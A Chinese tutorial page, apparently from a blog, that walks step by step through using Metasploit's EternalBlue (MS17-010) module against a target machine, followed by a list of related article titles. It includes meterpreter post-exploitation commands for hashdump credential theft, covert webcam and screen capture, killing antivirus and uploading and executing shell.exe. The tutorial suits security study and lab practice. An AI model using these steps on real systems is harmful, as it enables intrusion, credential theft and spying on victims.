kali通过msf利用永恒之蓝攻击服务器
1、通过命令“msfconsole”启动msf,或者通过菜单启动msf
msf模块说明:
exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。
auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。
payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。
post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。
encoders:编码模块,将攻击载荷进行编码,来绕过防护软件拦截。
2、通过"show exploits"命令,可以查看当前2099个攻击模块,如下部份截图。
3、模块太多,通过关键字搜索“永恒之蓝”漏洞编号“ms17”进行搜索可以看到前序号为6的攻击模块就是要用的,所以输入命令“use 6”,代表当前使用这个模块进行攻击。
4、通过输入option命令显示当前攻击利用模块所需填入的参数,required是必填的,如下图除了RHOSTS需要填入攻击主机IP外,其它都有默认值,所以这里只需要设置rhost即可。
设置好后的参数如下:
5、验证靶机445端口是否开启,否则就不能利用,从下图可以看到445端口是open状态,即可以利用。
6、通过运行“run”命令,扫描靶机,可以看到第一行己经识别出来了有可能能利用ms17漏洞,而且还识别出来了靶机系统的信息。
7、上面己经进行了扫描也确定了可以利用ms17漏洞进行攻击,哪么接下来就得利用msf提供的攻击载荷模块,如下进行search ms17后从序号7~10都是相关的攻击载荷模块,这里永恒之蓝要用到的则是序号为8的模块。
8、通过show payloads显示所有载荷模块,这里需要用到的是tcp反向连接的方式。所以 use 15,表示要使用序号为15的载荷模块。
9、设置payload攻击的目标地址
10、通过 "run" 进行攻击,从如下图可以看出己经攻击成功了。
通过getuid说明己经拿到了system权限
通过shell命令,可以直接连接靶机的dos命令窗口
11、攻击成功后可以把当前进程放入后台,这样就可以再重新攻击别的机器。
通过hashdump获取当前系统的密码
12、获得了meterpreter后我们还能做些其它操作
webcam_list:查看摄像头
webcam_snap:通过摄像头拍照
webcam_stream:通过摄像头开启视频
screenshost:获取屏幕截图
screenshare:实时监控桌面
shutdown:关闭目标机器
run killav:关闭杀毒软件
run getgui-e 启用远程桌面
download C:\\1.txt 1.txt下载文件
upload /var/www/shell.exe D:\\shell.exe上传文件
execute -f shell.exe 执行文件
13、进程迁移,在进程少稳定的情况下,可以把当前会话进程迁移到其它进程上去。
kali通过msf利用永恒之蓝攻击服务器相关推荐
- MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)
任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令"msfconsole ",启动Metasploit:输入命令"use auxiliary/scanner/ ...
- MSF利用永恒之蓝渗透win2003
1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...
- 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击
1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
- 经典利用永恒之蓝漏洞对Windows操作系统进行攻击
利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...
- 利用永恒之蓝漏洞+修复方法(MS17-010)
文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...
- 利用永恒之蓝渗透WIN7
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:17 ...
- 模拟“永恒之蓝”攻击,实现系统提权
实验目的: 使用Kali Linux平台的"metasploit framework"工具,针对Windows7操作系统模拟"永恒之蓝"攻击,实现系统提权. 实 ...
- python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
1.Metaspolit介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新 ...
- 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大
一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...
最新文章
- Linux 环境变量配置
- 1024程序员节 继续薅羊毛
- 熟练掌握python是什么概念-Quant面试时说:熟练掌握Python,请三思,不然凉凉~
- Flume fan out(扇出)详解
- WEB前端 实现图片懒加载 echo.js
- 利用python爬虫(案例6+part14)--如何爬取科研数据
- matlab做比例积分微分控制,收放卷卷径计算+闭环摆杆控制参数自适应PID控制算法(变比例变积分变微分)介绍...
- php 设置excel格式,php 操作excel文件的方法小结
- Jenkins --SVN
- *【牛客 1 - A】矩阵(字符串hash)
- Mac支持NTFS两款软件
- 李洪强经典面试题45
- 25条实用简洁的Python代码
- Java实现文件下载Zip压缩
- 基于团队的持续优化之道
- 遥感(4):卫星遥感图像处理
- env下pkgs --update没有反应直接退出的问题解决方法
- 【HCIE TAC】第二题
- 微信mars学习笔记
- 金山办公2020校招C++开发工程师笔试题(一)
热门文章
- android 点击对话框按钮 不关闭按钮,Android在单击PositiveButton后不要关闭AlertDialog...
- win7 x64部署和串口调试虚拟驱动toaster
- ORACLE用自定义函数实现EXCEL中的NORMSINV与NORMSDIST函数功能
- 我认知的 DevOps 核心价值
- SQLite 基本语法(二)
- 瀑布流插件WookMark
- ReactNative第三方组件库
- OpenAI Gym 关于CartPole的模拟退火解法
- 小黄鸡 php,小黄鸡simsimi接口
- 在Win7下去掉快捷方式箭头的简便手动操作